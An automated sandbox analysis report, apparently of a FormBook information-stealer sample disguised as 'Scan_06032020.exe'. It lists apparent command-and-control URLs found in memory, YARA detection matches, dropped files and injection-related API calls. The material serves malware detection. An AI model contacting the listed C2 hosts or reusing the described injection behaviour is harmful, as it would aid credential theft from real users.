79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 50 72 6f 78 69 6d 61 20 4e 6f 76 61 27 3b 0a 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 22 29 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 3f 23 69 65 66 69 78 22 29 20 66 6f 72 6d 61 74 28 22 65 6d 62 65 64 64
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000005.00000000.560432526.0000000002630000.00000004.00000001.sdmpString found in binary or memory: http://ns.adob1
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.3dcellmodelscongress.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.3dcellmodelscongress.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.3dcellmodelscongress.com/mq3/www.tams.rocks
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.3dcellmodelscongress.comReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.aaronnational.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.aaronnational.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.aaronnational.com/mq3/www.askcopdtreatmentok.live
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.aaronnational.comReferer:
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.askcopdtreatmentok.live
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.askcopdtreatmentok.live/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.askcopdtreatmentok.live/mq3/www.snagabag31.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.askcopdtreatmentok.liveReferer:
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.greenerpharms.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.greenerpharms.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.greenerpharms.com/mq3/www.sj233.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.greenerpharms.comReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp, NETSTAT.EXE, 00000006.00000002.1162864887.0000000003A79000.00000004.00000001.sdmpString found in binary or memory: http://www.hugoph.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp, NETSTAT.EXE, 00000006.00000002.1162864887.0000000003A79000.00000004.00000001.sdmpString found in binary or memory: http://www.hugoph.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.hugoph.com/mq3/www.xn--3bst11cpvj0o2a.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.hugoph.comReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.icbjesusdenazaret.net
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.icbjesusdenazaret.net/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.icbjesusdenazaret.net/mq3/www.porcber.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.icbjesusdenazaret.netReferer:
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.operatorcloud.net
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.operatorcloud.net/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.operatorcloud.net/mq3/www.aaronnational.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.operatorcloud.netReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.porcber.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.porcber.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.porcber.com/mq3/www.hugoph.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.porcber.comReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.r-ev-ival.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.r-ev-ival.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.r-ev-ival.com/mq3/www.operatorcloud.net
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.r-ev-ival.comReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.rolex218238.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.rolex218238.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.rolex218238.com/mq3/www.greenerpharms.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.rolex218238.comReferer:
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.sj233.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.sj233.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.sj233.com/mq3/www.wwwx36599.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.sj233.comReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.snagabag31.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.snagabag31.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.snagabag31.com/mq3/www.3dcellmodelscongress.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.snagabag31.comReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.tams.rocks
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.tams.rocks/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.tams.rocks/mq3/www.yoxi.ltd
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.tams.rocksReferer:
          Source: ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.wwwx36599.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.wwwx36599.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.wwwx36599.com/mq3/S
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.wwwx36599.comReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.xn--3bst11cpvj0o2a.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.xn--3bst11cpvj0o2a.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.xn--3bst11cpvj0o2a.com/mq3/www.r-ev-ival.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.xn--3bst11cpvj0o2a.comReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.yoxi.ltd
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.yoxi.ltd/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.yoxi.ltd/mq3/www.rolex218238.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.yoxi.ltdReferer:
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: ufipp6ljxlz.exe, 00000010.00000002.880761472.0000000003210000.00000004.00000001.sdmpString found in binary or memory: https://github.com/KamilBest/2048Game
          Source: NETSTAT.EXE, 00000006.00000002.1159788515.0000000002E38000.00000004.00000001.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?hl=en&origin=https%3A%2F%2Fwww.google.ch&pid=1&spid=1&prid=190
          Source: NETSTAT.EXE, 00000006.00000002.1163098006.0000000003D6F000.00000004.00000001.sdmpString found in binary or memory: https://www.hugoph.com/mq3/?1bxh=3fSHFPhPtFX80vu0&qFNHgHIH=KqoVQGmIJAwVdvnbXHFhC3/cGIUPqT0Z2GEszuVtR

          Source: Scan_06032020.exe, 00000000.00000002.556283565.0000000000DD0000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.604818443.0000000001460000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1159857332.0000000002E60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.558930048.00000000043CC000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.891510039.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.895810906.0000000000340000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1157158132.0000000000AE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.604415201.00000000013D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.603513720.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.893009636.0000000000E80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.Scan_06032020.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.ufipp6ljxlz.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.ufipp6ljxlz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Scan_06032020.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\NETSTAT.EXEDropped file: C:\Users\user\AppData\Roaming\N629P6-6\N62logri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\NETSTAT.EXEDropped file: C:\Users\user\AppData\Roaming\N629P6-6\N62logrf.iniJump to dropped file
          Source: C:\Windows\SysWOW64\NETSTAT.EXEDropped file: C:\Users\user\AppData\Roaming\N629P6-6\N62logrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.604818443.0000000001460000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.604818443.0000000001460000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1159857332.0000000002E60000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1159857332.0000000002E60000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.558930048.00000000043CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.558930048.00000000043CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.891510039.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.891510039.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.895810906.0000000000340000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.895810906.0000000000340000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1157158132.0000000000AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1157158132.0000000000AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.604415201.00000000013D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.604415201.00000000013D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.603513720.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.603513720.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.893009636.0000000000E80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.893009636.0000000000E80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.Scan_06032020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.Scan_06032020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.2.ufipp6ljxlz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.2.ufipp6ljxlz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.2.ufipp6ljxlz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.2.ufipp6ljxlz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.Scan_06032020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.Scan_06032020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_00419830 NtCreateFile,4_2_00419830
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_004198E0 NtReadFile,4_2_004198E0
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_00419960 NtClose,4_2_00419960
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_00419A10 NtAllocateVirtualMemory,4_2_00419A10
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_0041982A NtCreateFile,4_2_0041982A
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_004198DA NtReadFile,4_2_004198DA
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_0041995B NtClose,4_2_0041995B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A350 NtQueryValueKey,LdrInitializeThunk,6_2_0343A350
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A360 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_0343A360
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A310 NtEnumerateValueKey,LdrInitializeThunk,6_2_0343A310
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A3D0 NtCreateKey,LdrInitializeThunk,6_2_0343A3D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A3E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_0343A3E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A240 NtReadFile,LdrInitializeThunk,6_2_0343A240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A260 NtWriteFile,LdrInitializeThunk,6_2_0343A260
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A2D0 NtClose,LdrInitializeThunk,6_2_0343A2D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A800 NtSetValueKey,LdrInitializeThunk,6_2_0343A800
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A750 NtCreateFile,LdrInitializeThunk,6_2_0343A750
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A610 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_0343A610
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A6A0 NtCreateSection,LdrInitializeThunk,6_2_0343A6A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A540 NtDelayExecution,LdrInitializeThunk,6_2_0343A540
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A560 NtQuerySystemInformation,LdrInitializeThunk,6_2_0343A560
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A470 NtSetInformationFile,LdrInitializeThunk,6_2_0343A470
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A410 NtQueryInformationToken,LdrInitializeThunk,6_2_0343A410
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343ACE0 NtCreateMutant,LdrInitializeThunk,6_2_0343ACE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A480 NtMapViewOfSection,LdrInitializeThunk,6_2_0343A480
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A370 NtQueryInformationProcess,6_2_0343A370
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A220 NtWaitForSingleObject,6_2_0343A220
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343BA30 NtSetContextThread,6_2_0343BA30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A2F0 NtQueryInformationFile,6_2_0343A2F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343B0B0 NtGetContextThread,6_2_0343B0B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A700 NtProtectVirtualMemory,6_2_0343A700
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A710 NtQuerySection,6_2_0343A710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A720 NtResumeThread,6_2_0343A720
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A780 NtOpenDirectoryObject,6_2_0343A780
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A650 NtQueueApcThread,6_2_0343A650
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A6D0 NtCreateProcessEx,6_2_0343A6D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343BD40 NtSuspendThread,6_2_0343BD40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A520 NtEnumerateKey,6_2_0343A520
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A5F0 NtReadVirtualMemory,6_2_0343A5F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A5A0 NtWriteVirtualMemory,6_2_0343A5A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A460 NtOpenProcess,6_2_0343A460
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343B470 NtOpenThread,6_2_0343B470
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343B410 NtOpenProcessToken,6_2_0343B410
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A430 NtQueryVirtualMemory,6_2_0343A430
